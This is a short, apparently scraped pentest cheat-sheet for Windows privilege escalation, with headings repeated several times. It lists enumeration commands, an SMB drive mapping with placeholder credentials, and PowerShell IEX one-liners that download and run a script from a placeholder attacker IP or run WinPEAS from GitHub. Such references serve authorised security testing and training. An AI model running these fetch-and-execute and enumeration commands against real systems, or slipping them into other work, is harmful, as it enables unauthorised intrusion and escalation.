System Enumeration

List Users

User Privileges

Search Files

If you dont know the full path of the file or even the extension, you can use: *<FILE>*

List Recursive Directories (PowerShell)

Execute Remote PowerShell Script

Last updated 10 months ago

System Enumeration

List Users

User Privileges

Search Files

If you dont know the full path of the file or even the extension, you can use: *<FILE>*

List Recursive Directories (PowerShell)

Execute Remote PowerShell Script

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"

Windows Privilege Escalation

net user

whoami /priv

cmd /s <FILE>

ls . -Recurse -Force -Name -Filter "<filter>" | foreach { ls -for $_ }

net use z: \\<ip>\<share> /user:<user> <pass>

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"

WinPEAS

System Enumeration

List Users

User Privileges

Search Files

List Recursive Directories (PowerShell)

Add SMB share to network drives

Execute Remote PowerShell Script

System Enumeration

List Users

User Privileges

Search Files

List Recursive Directories (PowerShell)

Add SMB share to network drives

Execute Remote PowerShell Script